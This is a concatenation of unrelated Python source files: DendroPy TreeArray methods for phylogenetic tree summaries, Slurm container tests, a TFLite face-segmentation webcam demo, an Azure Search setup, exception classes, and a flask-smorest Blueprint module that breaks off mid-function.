if tree.weight is not None and self.use_tree_weights:
weight_to_use = float(tree.weight)
else:
weight_to_use = 1.0
# accession info
if index is None:
index = len(self._tree_split_bitmasks)
self._tree_split_bitmasks.append(splits)
self._tree_leafset_bitmasks.append(tree.seed_node.edge.bipartition.leafset_bitmask)
self._tree_edge_lengths.append(edge_lengths)
self._tree_weights.append(weight_to_use)
else:
self._tree_split_bitmasks.insert(index, splits)
self._tree_leafset_bitmasks.insert(index,
tree.seed_node.edge.bipartition.leafset_bitmask)
self._tree_edge_lengths.insert(index, edge_lengths)
self._tree_weights.insert(index, weight_to_use)
return index, splits, edge_lengths, weight_to_use
def add_trees(self, trees, is_bipartitions_updated=False):
"""
Adds multiple structures represneted by an iterator over or iterable of
|Tree| instances to the collection.
Parameters
----------
trees : iterator over or iterable of |Tree| instances
An iterator over or iterable of |Tree| instances. Thess must
have the same rooting state as all the other trees accessioned into
this collection as well as that of ``self.is_rooted_trees``.
is_bipartitions_updated : bool
If |False| [default], then the tree will have its splits encoded or
updated. Otherwise, if |True|, then the tree is assumed to have its
splits already encoded and updated.
"""
for tree in trees:
self.add_tree(tree,
is_bipartitions_updated=is_bipartitions_updated)
##############################################################################
## I/O
def read_from_files(self,
files,
schema,
**kwargs):
"""
Adds multiple structures from one or more external file sources to the
collection.
Parameters
----------
files : iterable of strings and/or file objects
A list or some other iterable of file paths or file-like objects
(string elements will be assumed to be paths to files, while all
other types of elements will be assumed to be file-like
objects opened for reading).
schema : string
The data format of the source. E.g., "nexus", "newick", "nexml".
\*\*kwargs : keyword arguments
These will be passed directly to the underlying schema-specific
reader implementation.
"""
if "taxon_namespace" in kwargs:
if kwargs["taxon_namespace"] is not self.taxon_namespace:
raise ValueError("TaxonNamespace object passed as keyword argument is not the same as self's TaxonNamespace reference")
kwargs.pop("taxon_namespace")
target_tree_offset = kwargs.pop("tree_offset", 0)
tree_yielder = self.tree_type.yield_from_files(
files=files,
schema=schema,
taxon_namespace=self.taxon_namespace,
**kwargs)
current_source_index = None
current_tree_offset = None
for tree_idx, tree in enumerate(tree_yielder):
current_yielder_index = tree_yielder.current_file_index
if current_source_index != current_yielder_index:
current_source_index = current_yielder_index
current_tree_offset = 0
if current_tree_offset >= target_tree_offset:
self.add_tree(tree=tree, is_bipartitions_updated=False)
current_tree_offset += 1
def _parse_and_add_from_stream(self,
stream,
schema,
**kwargs):
cur_size = len(self._tree_split_bitmasks)
self.read_from_files(files=[stream], schema=schema, **kwargs)
new_size = len(self._tree_split_bitmasks)
return new_size - cur_size
def read(self, **kwargs):
"""
Add |Tree| objects to existing |TreeList| from data source providing
one or more collections of trees.
**Mandatory Source-Specification Keyword Argument (Exactly One Required):**
- **file** (*file*) -- File or file-like object of data opened for reading.
- **path** (*str*) -- Path to file of data.
- **url** (*str*) -- URL of data.
- **data** (*str*) -- Data given directly.
**Mandatory Schema-Specification Keyword Argument:**
- **schema** (*str*) -- Identifier of format of data given by the
"``file``", "``path``", "``data``", or "``url``" argument
specified above: ":doc:`newick </schemas/newick>`", ":doc:`nexus
</schemas/nexus>`", or ":doc:`nexml </schemas/nexml>`". See
"|Schemas|" for more details.
**Optional General Keyword Arguments:**
- **collection_offset** (*int*) -- 0-based index of tree block or
collection in source to be parsed. If not specified then the
first collection (offset = 0) is assumed.
- **tree_offset** (*int*) -- 0-based index of first tree within the
collection specified by ``collection_offset`` to be parsed (i.e.,
skipping the first ``tree_offset`` trees). If not
specified, then the first tree (offset = 0) is assumed (i.e., no
trees within the specified collection will be skipped). Use this
to specify, e.g. a burn-in.
- **ignore_unrecognized_keyword_arguments** (*bool*) -- If |True|,
then unsupported or unrecognized keyword arguments will not
result in an error. Default is |False|: unsupported keyword
arguments will result in an error.
**Optional Schema-Specific Keyword Arguments:**
These provide control over how the data is interpreted and
processed, and supported argument names and values depend on
the schema as specified by the value passed as the "``schema``"
argument. See "|Schemas|" for more details.
**Examples:**
::
tree_array = dendropy.TreeArray()
tree_array.read(
file=open('treefile.tre', 'rU'),
schema="newick",
tree_offset=100)
tree_array.read(
path='sometrees.nexus',
schema="nexus",
collection_offset=2,
tree_offset=100)
tree_array.read(
data="((A,B),(C,D));((A,C),(B,D));",
schema="newick")
tree_array.read(
url="http://api.opentreeoflife.org/v2/study/pg_1144/tree/tree2324.nex",
schema="nexus")
"""
return basemodel.MultiReadable._read_from(self, **kwargs)
##############################################################################
## Container (List) Interface
def append(tree, is_bipartitions_updated=False):
"""
Adds a |Tree| instance to the collection before position given
by ``index``.
Parameters
----------
tree : |Tree|
A |Tree| instance. This must have the same rooting state as
all the other trees accessioned into this collection as well as
that of ``self.is_rooted_trees``.
is_bipartitions_updated : bool
If |False| [default], then the tree will have its splits encoded or
updated. Otherwise, if |True|, then the tree is assumed to have its
splits already encoded and updated.
"""
return self.add_tree(tree=tree,
is_bipartitions_updated=is_bipartitions_updated)
def insert(index, tree, is_bipartitions_updated=False):
"""
Adds a |Tree| instance to the collection before position given
by ``index``.
Parameters
----------
index : integer
Insert before index.
tree : |Tree|
A |Tree| instance. This must have the same rooting state as
all the other trees accessioned into this collection as well as
that of ``self.is_rooted_trees``.
is_bipartitions_updated : bool
If |False| [default], then the tree will have its splits encoded or
updated. Otherwise, if |True|, then the tree is assumed to have its
splits already encoded and updated.
Returns
-------
index : int
The index of the accession.
s : iterable of splits
A list of split bitmasks from ``tree``.
e :
A list of edge length values ``tree``.
"""
return self.add_tree(tree=tree,
is_bipartitions_updated=is_bipartitions_updated,
index=index)
def extend(self, tree_array):
"""
Accession of data from ``tree_array`` to self.
Parameters
----------
tree_array : |TreeArray|
A |TreeArray| instance from which to add data.
"""
assert self.taxon_namespace is tree_array.taxon_namespace
assert self._is_rooted_trees is tree_array._is_rooted_trees
assert self.ignore_edge_lengths is tree_array.ignore_edge_lengths
assert self.ignore_node_ages is tree_array.ignore_node_ages
assert self.use_tree_weights is tree_array.use_tree_weights
self._tree_split_bitmasks.extend(tree_array._tree_split_bitmasks)
self._tree_edge_lengths.extend(tree_array._tree_edge_lengths)
self._tree_weights.extend(other._tree_weights)
self._split_distribution.update(tree_array._split_distribution)
return self
def __iadd__(self, tree_array):
"""
Accession of data from ``tree_array`` to self.
Parameters
----------
tree_array : |TreeArray|
A |TreeArray| instance from which to add data.
"""
return self.extend(tree_array)
def __add__(self, other):
"""
Creates and returns new |TreeArray|.
Parameters
----------
other : iterable of |Tree| objects
Returns
-------
tlist : |TreeArray| object
|TreeArray| object containing clones of |Tree| objects
in ``self`` and ``other``.
"""
ta = TreeArray(
taxon_namespace=self.taxon_namespace,
is_rooted_trees=self._is_rooted_trees,
ignore_edge_lengths=self.ignore_edge_lengths,
ignore_node_ages=self.ignore_node_ages,
use_tree_weights=self.use_tree_weights,
ultrametricity_precision=self._split_distribution.ultrametricity_precision,
)
ta.default_edge_length_value = self.default_edge_length_value
ta.tree_type = self.tree_type
ta += self
ta += other
return ta
def __contains__(self, splits):
# expensive!!
return tuple(splits) in self._tree_split_bitmasks
def __delitem__(self, index):
raise NotImplementedError
# expensive!!
# tree_split_bitmasks = self._trees_splits[index]
### TODO: remove this "tree" from underlying splits distribution
# for split in tree_split_bitmasks:
# self._split_distribution.split_counts[split] -= 1
# etc.
# becomes complicated because tree weights need to be updated etc.
# del self._tree_split_bitmasks[index]
# del self._tree_edge_lengths[index]
# return
def __iter__(self):
"""
Yields pairs of (split, edge_length) from the store.
"""
for split, edge_length in zip(self._tree_split_bitmasks, self._tree_edge_lengths):
yield split, edge_length
def __reversed__(self):
raise NotImplementedError
def __len__(self):
return len(self._tree_split_bitmasks)
def __getitem__(self, index):
raise NotImplementedError
# """
# Returns a pair of tuples, ( (splits...), (lengths...) ), corresponding
# to the "tree" at ``index``.
# """
# return self._tree_split_bitmasks[index], self._tree_edge_lengths[index]
def __setitem__(self, index, value):
raise NotImplementedError
def clear(self):
raise NotImplementedError
self._tree_split_bitmasks = []
self._tree_edge_lengths = []
self._tree_leafset_bitmasks = []
self._split_distribution.clear()
def index(self, splits):
raise NotImplementedError
return self._tree_split_bitmasks.index(splits)
def pop(self, index=-1):
raise NotImplementedError
def remove(self, tree):
raise NotImplementedError
def reverse(self):
raise NotImplementedError
def sort(self, key=None, reverse=False):
raise NotImplementedError
##############################################################################
## Accessors/Settors
def get_split_bitmask_and_edge_tuple(self, index):
"""
Returns a pair of tuples, ( (splits...), (lengths...) ), corresponding
to the "tree" at ``index``.
"""
return self._tree_split_bitmasks[index], self._tree_edge_lengths[index]
##############################################################################
## Calculations
def calculate_log_product_of_split_supports(self,
include_external_splits=False,
):
"""
Calculates the log product of split support for each of the trees in
the collection.
Parameters
----------
include_external_splits : bool
If |True|, then non-internal split posteriors will be included in
the score. Defaults to |False|: these are skipped. This should only
make a difference when dealing with splits collected from trees of
different leaf sets.
Returns
-------
s : tuple(list[numeric], integer)
Returns a tuple, with the first element being the list of scores
and the second being the index of the highest score. The element order
corresponds to the trees accessioned in the collection.
"""
assert len(self._tree_leafset_bitmasks) == len(self._tree_split_bitmasks)
scores = []
max_score = None
max_score_tree_idx = None
split_frequencies = self._split_distribution.split_frequencies
for tree_idx, (tree_leafset_bitmask, split_bitmasks) in enumerate(zip(self._tree_leafset_bitmasks, self._tree_split_bitmasks)):
log_product_of_split_support = 0.0
for split_bitmask in split_bitmasks:
if (include_external_splits
or split_bitmask == tree_leafset_bitmask # count root edge (following BEAST)
or not treemodel.Bipartition.is_trivial_bitmask(split_bitmask, tree_leafset_bitmask)
):
split_support = split_frequencies.get(split_bitmask, 0.0)
if split_support:
log_product_of_split_support += math.log(split_support)
if max_score is None or max_score < log_product_of_split_support:
max_score = log_product_of_split_support
max_score_tree_idx = tree_idx
scores.append(log_product_of_split_support)
return scores, max_score_tree_idx
def maximum_product_of_split_support_tree(self,
include_external_splits=False,
summarize_splits=True,
**split_summarization_kwargs
):
"""
Return the tree with that maximizes the product of split supports, also
known as the "Maximum Clade Credibility Tree" or MCCT.
Parameters
----------
include_external_splits : bool
If |True|, then non-internal split posteriors will be included in
the score. Defaults to |False|: these are skipped. This should only
make a difference when dealing with splits collected from trees of
different leaf sets.
Returns
-------
mcct_tree : Tree
Tree that maximizes the product of split supports.
"""
scores, max_score_tree_idx = self.calculate_log_product_of_split_supports(
include_external_splits=include_external_splits,
)
tree = self.restore_tree(
index=max_score_tree_idx,
**split_summarization_kwargs)
tree.log_product_of_split_support = scores[max_score_tree_idx]
if summarize_splits:
self._split_distribution.summarize_splits_on_tree(
tree=tree,
is_bipartitions_updated=True,
**split_summarization_kwargs
)
return tree
def calculate_sum_of_split_supports(self,
include_external_splits=False,
):
"""
Calculates the *sum* of split support for all trees in the
collection.
Parameters
----------
include_external_splits : bool
If |True|, then non-internal split posteriors will be included in
the score. Defaults to |False|: these are skipped. This should only
make a difference when dealing with splits collected from trees of
different leaf sets.
Returns
-------
s : tuple(list[numeric], integer)
Returns a tuple, with the first element being the list of scores
and the second being the index of the highest score. The element order
corresponds to the trees accessioned in the collection.
"""
assert len(self._tree_leafset_bitmasks) == len(self._tree_split_bitmasks)
scores = []
max_score = None
max_score_tree_idx = None
split_frequencies = self._split_distribution.split_frequencies
for tree_idx, (tree_leafset_bitmask, split_bitmasks) in enumerate(zip(self._tree_leafset_bitmasks, self._tree_split_bitmasks)):
sum_of_support = 0.0
for split_bitmask in split_bitmasks:
if (include_external_splits
or split_bitmask == tree_leafset_bitmask # count root edge (following BEAST)
or not treemodel.Bipartition.is_trivial_bitmask(split_bitmask, tree_leafset_bitmask)
):
split_support = split_frequencies.get(split_bitmask, 0.0)
sum_of_support += split_support
if max_score is None or max_score < sum_of_support:
max_score = sum_of_support
max_score_tree_idx = tree_idx
scores.append(sum_of_support)
return scores, max_score_tree_idx
def maximum_sum_of_split_support_tree(self,
include_external_splits=False,
summarize_splits=True,
**split_summarization_kwargs
):
"""
Return the tree with that maximizes the *sum* of split supports.
Parameters
----------
include_external_splits : bool
If |True|, then non-internal split posteriors will be included in
the score. Defaults to |False|: these are skipped. This should only
make a difference when dealing with splits collected from trees of
different leaf sets.
Returns
-------
mst_tree : Tree
Tree that maximizes the sum of split supports.
"""
scores, max_score_tree_idx = self.calculate_sum_of_split_supports(
include_external_splits=include_external_splits,
)
tree = self.restore_tree(
index=max_score_tree_idx,
**split_summarization_kwargs
)
tree.sum_of_split_support = scores[max_score_tree_idx]
if summarize_splits:
self._split_distribution.summarize_splits_on_tree(
tree=tree,
is_bipartitions_updated=True,
**split_summarization_kwargs
)
return tree
def collapse_edges_with_less_than_minimum_support(self,
tree,
min_freq=constants.GREATER_THAN_HALF,
):
return self.split_distribution.collapse_edges_with_less_than_minimum_support(
tree=tree,
min_freq=min_freq)
def consensus_tree(self,
min_freq=constants.GREATER_THAN_HALF,
summarize_splits=True,
**split_summarization_kwargs
):
"""
Returns a consensus tree from splits in ``self``.
Parameters
----------
min_freq : real
The minimum frequency of a split in this distribution for it to be
added to the tree.
is_rooted : bool
Should tree be rooted or not? If *all* trees counted for splits are
explicitly rooted or unrooted, then this will default to |True| or
|False|, respectively. Otherwise it defaults to |None|.
\*\*split_summarization_kwargs : keyword arguments
These will be passed directly to the underlying
`SplitDistributionSummarizer` object. See
:meth:`SplitDistributionSummarizer.configure` for options.
Returns
-------
t : consensus tree
"""
tree = self._split_distribution.consensus_tree(
min_freq=min_freq,
is_rooted=self.is_rooted_trees,
summarize_splits=summarize_splits,
**split_summarization_kwargs
)
# return self._split_distribution.consensus_tree(*args, **kwargs)
return tree
##############################################################################
## Mapping of Split Support
def summarize_splits_on_tree(self,
tree,
is_bipartitions_updated=False,
**kwargs):
if self.taxon_namespace is not tree.taxon_namespace:
raise error.TaxonNamespaceIdentityError(self, tree)
self._split_distribution.summarize_splits_on_tree(
tree=tree,
is_bipartitions_updated=is_bipartitions_updated,
**kwargs
)
##############################################################################
## Tree Reconstructions
def restore_tree(self,
index,
summarize_splits_on_tree=False,
**split_summarization_kwargs
):
split_bitmasks = self._tree_split_bitmasks[index]
if self.ignore_edge_lengths:
split_edge_lengths = None
else:
assert len(self._tree_split_bitmasks) == len(self._tree_edge_lengths)
edge_lengths = self._tree_edge_lengths[index]
split_edge_lengths = dict(zip(split_bitmasks, edge_lengths))
tree = self.tree_type.from_split_bitmasks(
split_bitmasks=split_bitmasks,
taxon_namespace=self.taxon_namespace,
is_rooted=self._is_rooted_trees,
split_edge_lengths=split_edge_lengths,
)
# if update_bipartitions:
# tree.encode_bipartitions()
if summarize_splits_on_tree:
split_summarization_kwargs["is_bipartitions_updated"] = True
self._split_distribution.summarize_splits_on_tree(
tree=tree,
**split_summarization_kwargs)
return tree
##############################################################################
## Topology Frequencies
def split_bitmask_set_frequencies(self):
"""
Returns a dictionary with keys being sets of split bitmasks and values
being the frequency of occurrence of trees represented by those split
bitmask sets in the collection.
"""
split_bitmask_set_count_map = collections.Counter()
assert len(self._tree_split_bitmasks) == len(self._tree_weights)
for split_bitmask_set, weight in zip(self._tree_split_bitmasks, self._tree_weights):
split_bitmask_set_count_map[frozenset(split_bitmask_set)] += (1.0 * weight)
split_bitmask_set_freqs = {}
normalization_weight = self._split_distribution.calc_normalization_weight()
# print("===> {}".format(normalization_weight))
for split_bitmask_set in split_bitmask_set_count_map:
split_bitmask_set_freqs[split_bitmask_set] = split_bitmask_set_count_map[split_bitmask_set] / normalization_weight
return split_bitmask_set_freqs
def bipartition_encoding_frequencies(self):
"""
Returns a dictionary with keys being bipartition encodings of trees
(as ``frozenset`` collections of |Bipartition| objects) and
values the frequency of occurrence of trees represented by that
encoding in the collection.
"""
# split_bitmask_set_freqs = self.split_bitmask_set_frequencies()
# bipartition_encoding_freqs = {}
# for split_bitmask_set, freq in split_bitmask_set_freqs.items():
# bipartition_encoding = []
# inferred_leafset = max(split_bitmask_set)
# for split_bitmask in split_bitmask_set:
# bipartition = treemodel.Bipartition(
# bitmask=split_bitmask,
# tree_leafset_bitmask=inferred_leafset,
# is_rooted=self._is_rooted_trees,
# is_mutable=False,
# compile_bipartition=True,
# )
# bipartition_encoding.append(bipartition)
# bipartition_encoding_freqs[frozenset(bipartition_encoding)] = freq
# return bipartition_encoding_freqs
bipartition_encoding_freqs = {}
topologies = self.topologies()
for tree in topologies:
bipartition_encoding_freqs[ frozenset(tree.encode_bipartitions()) ] = tree.frequency
return bipartition_encoding_freqs
def topologies(self,
sort_descending=None,
frequency_attr_name="frequency",
frequency_annotation_name="frequency",
):
"""
Returns a |TreeList| instance containing the reconstructed tree
topologies (i.e. |Tree| instances with no edge weights) in the
collection, with the frequency added as an attributed.
Parameters
----------
sort_descending : bool
If |True|, then topologies will be sorted in *descending* frequency
order (i.e., topologies with the highest frequencies will be listed
first). If |False|, then they will be sorted in *ascending*
frequency. If |None| (default), then they will not be sorted.
frequency_attr_name : str
Name of attribute to add to each |Tree| representing
the frequency of that topology in the collection. If |None|
then the attribute will not be added.
frequency_annotation_name : str
Name of annotation to add to the annotations of each |Tree|,
representing the frequency of that topology in the collection. The
value of this annotation will be dynamically-bound to the attribute
specified by ``frequency_attr_name`` unless that is |None|. If
``frequency_annotation_name`` is |None| then the annotation will not
be added.
"""
if sort_descending is not None and frequency_attr_name is None:
raise ValueError("Attribute needs to be set on topologies to enable sorting")
split_bitmask_set_freqs = self.split_bitmask_set_frequencies()
topologies = TreeList(taxon_namespace=self.taxon_namespace)
for split_bitmask_set, freq in split_bitmask_set_freqs.items():
tree = self.tree_type.from_split_bitmasks(
split_bitmasks=split_bitmask_set,
taxon_namespace=self.taxon_namespace,
is_rooted=self._is_rooted_trees,
)
if frequency_attr_name is not None:
setattr(tree, frequency_attr_name, freq)
if frequency_annotation_name is not None:
tree.annotations.add_bound_attribute(
attr_name=frequency_attr_name,
annotation_name=frequency_annotation_name,
)
else:
tree.annotations.add_new(
frequency_annotation_name,
freq,
)
topologies.append(tree)
if sort_descending is not None:
topologies.sort(key=lambda t: getattr(t, frequency_attr_name), reverse=sort_descending)
return topologies
| StarcoderdataPython |
1942960 | <reponame>drewsilcock/docker-centos7-slurm<filename>tests/test_slurm.py<gh_stars>1-10
import time
import pytest
@pytest.mark.parametrize("partition", ["normal", "debug"])
def test_partitions_are_up(host, partition):
partition_status = host.check_output(f"scontrol -o show partition {partition}")
assert "State=UP" in partition_status
def test_job_can_run(host):
host.run('sbatch --wrap="hostname"')
time.sleep(2)
assert host.file("slurm-1.out").content_string == "slurmctl\n"
| StarcoderdataPython |
8026353 | import sys
import argparse
import numpy as np
import cv2
import time
from PIL import Image
try:
from tflite_runtime.interpreter import Interpreter
except:
from tensorflow.lite.python.interpreter import Interpreter
fps = ""
framecount = 0
time1 = 0
LABEL_CONTOURS = [(0, 0, 0), # 0=background
# 1=skin, 2=l_brow, 3=r_brow, 4=l_eye, 5=r_eye
(128, 0, 0), (0, 128, 0), (128, 128, 0), (0, 0, 128), (128, 0, 128),
# 6=eye_g, 7=l_ear, 8=r_ear, 9=ear_r, 10=nose
(0, 128, 128), (128, 128, 128), (64, 0, 0), (192, 0, 0), (64, 128, 0),
# 11=mouth, 12=u_lip, 13=l_lip, 14=neck, 15=neck_l
(192, 128, 0), (64, 0, 128), (192, 0, 128), (64, 128, 128), (192, 128, 128),
# 16=cloth, 17=hair, 18=hat
(0, 64, 0), (128, 64, 0), (0, 192, 0)]
def decode_prediction_mask(mask):
mask_shape = mask.shape
mask_color = np.zeros(shape=[mask_shape[0], mask_shape[1], 3], dtype=np.uint8)
unique_label_ids = [v for v in np.unique(mask) if v != 0 and v != 255]
for label_id in unique_label_ids:
idx = np.where(mask == label_id)
mask_color[idx] = LABEL_CONTOURS[label_id]
return mask_color
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--deep_model", default="bisenetv2_celebamaskhq_448x448_integer_quant.tflite",
help="Path of the BiSeNetV2 model. Integer Quant models are optimized for ARM. Try Weight Quant if you are using x86.")
parser.add_argument("--usbcamno", type=int, default=0, help="USB Camera number.")
parser.add_argument('--camera_width', type=int, default=640, help='USB Camera resolution (width). (Default=640)')
parser.add_argument('--camera_height', type=int, default=480, help='USB Camera resolution (height). (Default=480)')
parser.add_argument('--vidfps', type=int, default=30, help='FPS of Video. (Default=30)')
parser.add_argument("--num_threads", type=int, default=4, help="Threads.")
args = parser.parse_args()
deep_model = args.deep_model
usbcamno = args.usbcamno
vidfps = args.vidfps
camera_width = args.camera_width
camera_height = args.camera_height
num_threads = args.num_threads
interpreter = Interpreter(model_path=deep_model, num_threads=num_threads)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()[0]['index']
bisenetv2_predictions = interpreter.get_output_details()[0]['index']
model_height = interpreter.get_input_details()[0]['shape'][1]
model_width = interpreter.get_input_details()[0]['shape'][2]
# print('interpreter.get_output_details()[0]:', interpreter.get_output_details()[0])
cam = cv2.VideoCapture(usbcamno)
cam.set(cv2.CAP_PROP_FPS, vidfps)
cam.set(cv2.CAP_PROP_FRAME_WIDTH, camera_width)
cam.set(cv2.CAP_PROP_FRAME_HEIGHT, camera_height)
waittime = 1
window_name = "USB Camera"
cv2.namedWindow(window_name, cv2.WINDOW_AUTOSIZE)
while True:
t1 = time.perf_counter()
ret, color_image = cam.read()
if not ret:
continue
# Normalization
prepimg_deep = cv2.resize(color_image, (model_width, model_height))
prepimg_deep = cv2.cvtColor(prepimg_deep, cv2.COLOR_BGR2RGB)
prepimg_deep = np.expand_dims(prepimg_deep, axis=0)
prepimg_deep = prepimg_deep.astype(np.float32)
prepimg_deep /= 255.0
prepimg_deep -= [[[0.5, 0.5, 0.5]]]
prepimg_deep /= [[[0.5, 0.5, 0.5]]]
# Run model
interpreter.set_tensor(input_details, prepimg_deep)
interpreter.invoke()
# Get results
predictions = interpreter.get_tensor(bisenetv2_predictions)
# Segmentation
imdraw = decode_prediction_mask(predictions)[:, :, (2, 1, 0)]
imdraw = cv2.cvtColor(imdraw, cv2.COLOR_RGB2BGR)
imdraw = cv2.resize(imdraw, (camera_width, camera_height))
cv2.putText(imdraw, fps, (camera_width-170,15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (38,0,255), 1, cv2.LINE_AA)
cv2.imshow(window_name, imdraw)
if cv2.waitKey(waittime)&0xFF == ord('q'):
break
# FPS calculation
framecount += 1
if framecount >= 10:
fps = "(Playback) {:.1f} FPS".format(time1/10)
framecount = 0
time1 = 0
t2 = time.perf_counter()
elapsedTime = t2-t1
time1 += 1/elapsedTime
| StarcoderdataPython |
11349557 | import asyncio
from aiohttp import ClientSession
import settings
from interfaces import *
async def setup_search_interface(app):
await asyncio.sleep(0)
setattr(app, 'search', AzureSearchInterface(
emails=AzureSearchIndexInterface(
settings.db.AZURE_SEARCH_EMAILS_INDEX_URL,
settings.db.AZURE_SEARCH_API_KEY,
ClientSession(loop=app.loop)
)
)) | StarcoderdataPython |
5148140 | from typing import Iterable
class SearchRetryException(Exception):
pass
class DataStoreException(Exception):
pass
class SearchException(Exception):
pass
class SearchDepthException(Exception):
pass
class UndefinedFunction(Exception):
pass
class ILMException(Exception):
pass
class MultiKeyError(KeyError):
def __init__(self, keys: Iterable[str], partial_output):
super().__init__(str(keys))
self.keys = set(keys)
self.partial_output = partial_output
| StarcoderdataPython |
11323030 | """API Blueprint
This is a subclass of Flask's Blueprint
It provides added features:
- Decorators to specify Marshmallow schema for view functions I/O
- API documentation registration
Documentation process works in several steps:
- At import time
- When a MethodView or a view function is decorated, relevant information
is automatically added to the object's ``_apidoc`` attribute.
- The ``Blueprint.doc`` decorator stores additional information in a separate
``_api_manual_doc``. It allows the user to specify documentation
information that flask-smorest can not - or does not yet - infer from the
code.
- The ``Blueprint.route`` decorator registers the endpoint in the Blueprint
and gathers all information about the endpoint in
``Blueprint._auto_docs[endpoint]`` and
``Blueprint._manual_docs[endpoint]``.
- At initialization time
- Schema instances are replaced either by their reference in the `schemas`
section of the spec if applicable, otherwise by their json representation.
- Automatic documentation is adapted to OpenAPI version and deep-merged with
manual documentation.
- Endpoints documentation is registered in the APISpec object.
"""
from collections import OrderedDict
from functools import wraps
from copy import deepcopy
from flask import Blueprint as FlaskBlueprint
from flask.views import MethodViewType
from .utils import deepupdate, load_info_from_docstring
from .arguments import ArgumentsMixin
from .response import ResponseMixin
from .pagination import PaginationMixin
from .etag import EtagMixin
from .spec import (
DEFAULT_REQUEST_BODY_CONTENT_TYPE, DEFAULT_RESPONSE_CONTENT_TYPE)
class Blueprint(
FlaskBlueprint,
ArgumentsMixin, ResponseMixin, PaginationMixin, EtagMixin):
"""Blueprint that registers info in API documentation"""
# Order in which the methods are presented in the spec
HTTP_METHODS = ['OPTIONS', 'HEAD', 'GET', 'POST', 'PUT', 'PATCH', 'DELETE']
DEFAULT_LOCATION_CONTENT_TYPE_MAPPING = {
"json": "application/json",
"form": "application/x-www-form-urlencoded",
"files": "multipart/form-data",
}
DOCSTRING_INFO_DELIMITER = "---"
def __init__(self, *args, **kwargs):
self.description = kwargs.pop('description', '')
super().__init__(*args, **kwargs)
# _[manual|auto]_docs are ordered dicts storing endpoints documentation
# {
# endpoint: {
# 'get': documentation,
# 'post': documentation,
# ...
# },
# ...
# }
self._auto_docs = OrderedDict()
self._manual_docs = OrderedDict()
self._endpoints = []
def route(self, rule, *, parameters=None, **options):
"""Decorator to register url rule in application
Also stores doc info for later registration
Use this to decorate a :class:`MethodView <flask.views.MethodView>` or
a resource function.
:param str rule: URL rule as string.
:param str endpoint: Endpoint for the registered URL rule (defaults
to function name).
:param list parameters: List of parameters relevant to all operations
in this path, only used to document the resource.
:param dict options: Options to be forwarded to the underlying
:class:`werkzeug.routing.Rule <Rule>` object.
"""
def decorator(func):
# By default, endpoint name is function name
endpoint = options.pop('endpoint', func.__name__)
# Prevent registering several times the same endpoint
# by silently renaming the endpoint in case of collision
if endpoint in self._endpoints:
endpoint = '{}_{}'.format(endpoint, len(self._endpoints))
self._endpoints.append(endpoint)
if isinstance(func, MethodViewType):
view_func = func.as_view(endpoint)
else:
view_func = func
# Add URL rule in Flask and store endpoint documentation
self.add_url_rule(rule, endpoint, view_func, **options)
self._store_endpoint_docs(endpoint, func, parameters, **options)
return func
return decorator
def _store_endpoint_docs(self, endpoint, obj, parameters, **options):
"""Store view or function doc info"""
endpoint_auto_doc = self._auto_docs.setdefault(
endpoint, OrderedDict())
endpoint_manual_doc = self._manual_docs.setdefault(
endpoint, OrderedDict())
def store_method_docs(method, function):
"""Add auto and manual doc to table for later registration"""
# Get auto documentation from decorators
# and summary/description from docstring
# Get manual documentation from @doc decorator
auto_doc = getattr(function, '_apidoc', {})
auto_doc.update(
load_info_from_docstring(
function.__doc__,
delimiter=self.DOCSTRING_INFO_DELIMITER
)
)
manual_doc = getattr(function, '_api_manual_doc', {})
# Store function auto and manual docs for later registration
method_l = method.lower()
endpoint_auto_doc[method_l] = auto_doc
endpoint_manual_doc[method_l] = manual_doc
# MethodView (class)
if isinstance(obj, MethodViewType):
for method in self.HTTP_METHODS:
if method in obj.methods:
func = getattr(obj, method.lower())
store_method_docs(method, func)
# Function
else:
methods = options.pop('methods', None) or ['GET']
for method in methods:
store_method_docs(method, obj)
endpoint_auto_doc['parameters'] = parameters
def register_views_in_doc(self, app, spec):
"""Register views information in documentation
If a schema in a parameter or a response appears in the spec
`schemas` section, it is replaced by a reference in the parameter or
response documentation:
"schema":{"$ref": "#/components/schemas/MySchema"}
"""
# This method uses the documentation information associated with each
# endpoint in self._[auto|manual]_docs to provide documentation for
# corresponding route to the spec object.
# Deepcopy to avoid mutating the source
# Allows registering blueprint multiple times (e.g. when creating
# multiple apps during tests)
auto_docs = deepcopy(self._auto_docs)
for endpoint, endpoint_auto_doc in auto_docs.items():
parameters = endpoint_auto_doc.pop('parameters')
doc = OrderedDict()
for method_l, endpoint_doc in endpoint_auto_doc.items():
# Format operations documentation in OpenAPI structure
self._prepare_doc(endpoint_doc, spec.openapi_version)
# Tag all operations with Blueprint name
endpoint_doc['tags'] = [self.name]
# Merge auto_doc and manual_doc into doc
manual_doc = self._manual_docs[endpoint][method_l]
doc[method_l] = deepupdate(endpoint_doc, manual_doc)
# Thanks to self.route, there can only be one rule per endpoint
full_endpoint = '.'.join((self.name, endpoint))
rule = next(app.url_map.iter_rules(full_endpoint))
spec.path(rule=rule, operations=doc, parameters=parameters)
def _prepare_doc(self, operation, openapi_version):
"""Format operation documentation in OpenAPI structure
The decorators store all documentation information in a dict structure
that is close to OpenAPI doc structure, so this information could
_almost_ be copied as is. Yet, some adjustemnts may have to be
performed, especially if the spec structure differs between OpenAPI
versions: the OpenAPI version is not known when the decorators are
applied but only at registration time when this method is called.
"""
# OAS 2
if openapi_version.major < 3:
if 'responses' in operation:
for resp in operation['responses'].values():
if 'example' in resp:
resp['examples'] = {
DEFAULT_RESPONSE_CONTENT_TYPE: resp.pop('example')}
if 'parameters' in operation:
for param in operation['parameters']:
if param['in'] in (
self.DEFAULT_LOCATION_CONTENT_TYPE_MAPPING
):
content_type = (
param.pop('content_type', None) or
self.DEFAULT_LOCATION_CONTENT_TYPE_MAPPING[
param['in']]
)
if content_type != DEFAULT_REQUEST_BODY_CONTENT_TYPE:
operation['consumes'] = [content_type, ]
# body and formData are mutually exclusive
break
# OAS 3
else:
if 'responses' in operation:
for resp in operation['responses'].values():
for field in ('schema', 'example', 'examples'):
if field in resp:
(
resp
.setdefault('content', {})
.setdefault(DEFAULT_RESPONSE_CONTENT_TYPE, {})
[field]
) = resp.pop(field)
if 'parameters' in operation:
for param in operation['parameters']:
if param['in'] in (
self.DEFAULT_LOCATION_CONTENT_TYPE_MAPPING
):
request_body = {
x: param[x]
for x in ('description', 'required')
if x in param
}
fields = {
x: param.pop(x)
for x in ('schema', 'example', 'examples')
if x in param
}
content_type = (
param.pop('content_type', None) or
